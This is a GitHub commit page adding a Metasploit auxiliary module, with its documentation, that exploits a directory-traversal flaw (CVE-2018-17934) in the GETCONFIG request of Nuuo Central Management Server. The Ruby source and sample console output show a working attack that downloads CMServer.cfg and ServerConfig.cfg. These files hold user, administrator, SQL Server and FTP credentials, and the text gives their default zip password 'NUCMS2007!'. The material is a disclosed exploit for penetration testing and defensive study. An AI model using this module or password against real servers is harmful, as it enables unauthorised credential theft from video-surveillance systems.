-
Notifications
You must be signed in to change notification settings - Fork 13.8k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #11293, Add Nuuo CMS file download
- Loading branch information
1 parent
c9467ea
commit 80147f5
Showing
2 changed files
with
157 additions
and
0 deletions.
There are no files selected for viewing
71 changes: 71 additions & 0 deletions
71
documentation/modules/auxiliary/gather/nuuo_cms_file_download.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,71 @@ | ||
## Description | ||
|
||
Nuuo CMS Authenticated Arbitrary File Download | ||
|
||
The GETCONFIG verb is used by a CMS client to obtain configuration files and other resources from the CMS server. An example request is below: | ||
|
||
``` | ||
GETCONFIG NUCM/1.0 | ||
FileName: <filename> | ||
FileType: <number> | ||
User-Session-No: <session-number> | ||
``` | ||
|
||
The FileType determines the directory where the file will be downloaded from. "FileType: 0" will download from the base installation directory (CMS_DIR), while "FileType: 1" will download from "<CMS_DIR>\Images\Map\". There are other defined FileType integers, but these have not been investigated in detail. | ||
|
||
The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\) characters. Therefore, this function can be abused to obtain any files off the file system, including: | ||
|
||
- CMServer.cfg, a file zipped with the password "NUCMS2007!" that contains the usernames and passwords of all the system users (enabling a less privileged user to obtain the administrator's password) | ||
- ServerConfig.cfg, another file zipped with the password "NUCMS2007!" that contains the SQL Server "sa" password as well the FTP server username and password | ||
- Any other sensitive files in the drive where CMS Server is installed. | ||
|
||
This module works in the following way: | ||
|
||
- if a SESSION number is present, uses that to login | ||
- if not, tries to authenticate with USERNAME and PASSWORD | ||
|
||
Due to the lack of ZIP encryption support in Metasploit, the module prints a warning indicating that the archive cannot be unzipped in Msf. | ||
|
||
## Vulnerable Application | ||
|
||
[NUUO Central Management Server (CMS): all versions up to and including 3.5.0](http://d1.nuuo.com/NUUO/CMS/) | ||
|
||
The following versions were tested: | ||
|
||
- 1.5.2 OK | ||
- 2.1.0 OK | ||
- 2.3.2 OK | ||
- 2.4.0 OK | ||
- 2.6.0 OK | ||
- 2.9.0 OK | ||
- 2.10.0 OK | ||
- 3.1 OK | ||
- 3.3 OK | ||
- 3.5 OK | ||
|
||
## Scenarios | ||
|
||
### Tested on Windows 10 Pro x64 running NCS Server 2.4.0 | ||
|
||
``` | ||
msf5 auxiliary(gather/nuuo_cms_file_download) > set rhosts 172.22.222.200 | ||
rhosts => 172.22.222.200 | ||
msf5 auxiliary(gather/nuuo_cms_file_download) > exploit | ||
[+] 172.22.222.200:5180 - Downloaded file to /home/msfdev/.msf4/loot/20190219064923_default_172.22.222.200_CMServer.cfg_227185.cfg | ||
[+] 172.22.222.200:5180 - Downloaded file to /home/msfdev/.msf4/loot/20190219064923_default_172.22.222.200_ServerConfig.cfg_050084.cfg | ||
[*] 172.22.222.200:5180 - The user and server configuration files were stored in the loot database. | ||
[*] 172.22.222.200:5180 - The files are ZIP encrypted, and due to the lack of the archive/zip gem, | ||
[*] 172.22.222.200:5180 - they cannot be decrypted in Metasploit. | ||
[*] 172.22.222.200:5180 - You will need to open them up with zip or a similar utility, and use the | ||
[*] 172.22.222.200:5180 - password NUCMS2007! to unzip them. | ||
[*] 172.22.222.200:5180 - Annoy the Metasploit developers until this gets fixed! | ||
[*] Auxiliary module execution completed | ||
msf5 auxiliary(gather/nuuo_cms_file_download) > | ||
``` | ||
|
||
## References | ||
|
||
- https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02 | ||
|
||
- https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,86 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Auxiliary | ||
|
||
include Msf::Exploit::Remote::Nuuo | ||
include Msf::Auxiliary::Report | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'Nuuo Central Management Server Authenticated Arbitrary File Download', | ||
'Description' => %q{ | ||
The Nuuo Central Management Server allows an authenticated user to download files from the | ||
installation folder. This functionality can be abused to obtain administrative credentials, | ||
the SQL Server database password and arbitrary files off the system with directory traversal. | ||
The module will attempt to download CMServer.cfg (the user configuration file with all the user | ||
passwords including the admin one), ServerConfig.cfg (the server configuration file with the | ||
SQL Server password) and a third file if the FILE argument is provided by the user. | ||
The two .cfg files are zip-encrypted files, but due to limitations of the Ruby ZIP modules | ||
included in Metasploit, these files cannot be decrypted programmatically. The user will | ||
have to open them with zip or a similar program and provide the default password "NUCMS2007!". | ||
This module will either use a provided session number (which can be guessed with an auxiliary | ||
module) or attempt to login using a provided username and password - it will also try the | ||
default credentials if nothing is provided. | ||
All versions of CMS server up to and including 3.5 are vulnerable to this attack. | ||
}, | ||
'Author' => | ||
[ | ||
'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module | ||
], | ||
'License' => MSF_LICENSE, | ||
'References' => | ||
[ | ||
[ 'CVE', '2018-17934' ], | ||
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ], | ||
[ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ], | ||
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ] | ||
|
||
], | ||
'Platform' => ['win'], | ||
'Privileged' => true, | ||
'DisclosureDate' => 'Oct 11 2018')) | ||
|
||
register_options( | ||
[ | ||
OptString.new('FILE', [false, 'Additional file to download, use ..\\ to traverse directories from \ | ||
the CMS install folder']) | ||
]) | ||
end | ||
|
||
def download_file(file_name, ctype='application/zip', decrypt=true) | ||
dl_file = nucs_download_file(file_name, decrypt) | ||
file_name = file_name.gsub('..\\', '') | ||
|
||
path = store_loot(file_name, ctype, datastore['RHOST'], | ||
dl_file, file_name, "Nuuo CMS #{file_name} downloaded") | ||
print_good("Downloaded file to #{path}") | ||
end | ||
|
||
|
||
def run | ||
nucs_login | ||
|
||
unless @nucs_session | ||
fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS') | ||
end | ||
|
||
download_file('CMServer.cfg') | ||
download_file('ServerConfig.cfg') | ||
|
||
# note that when (if) archive/zip is included in msf, the code in the Nuuo mixin needs to be changed | ||
# see the download_file method for details | ||
print_status('The user and server configuration files were stored in the loot database.') | ||
print_status('The files are ZIP encrypted, and due to the lack of the archive/zip gem,') | ||
print_status('they cannot be decrypted in Metasploit.') | ||
print_status('You will need to open them up with zip or a similar utility, and use the') | ||
print_status('password NUCMS2007! to unzip them.') | ||
print_status('Annoy the Metasploit developers until this gets fixed!') | ||
|
||
if datastore['FILE'] | ||
filedata = download_file(datastore['FILE'], 'application/octet-stream', false) | ||
end | ||
end | ||
end |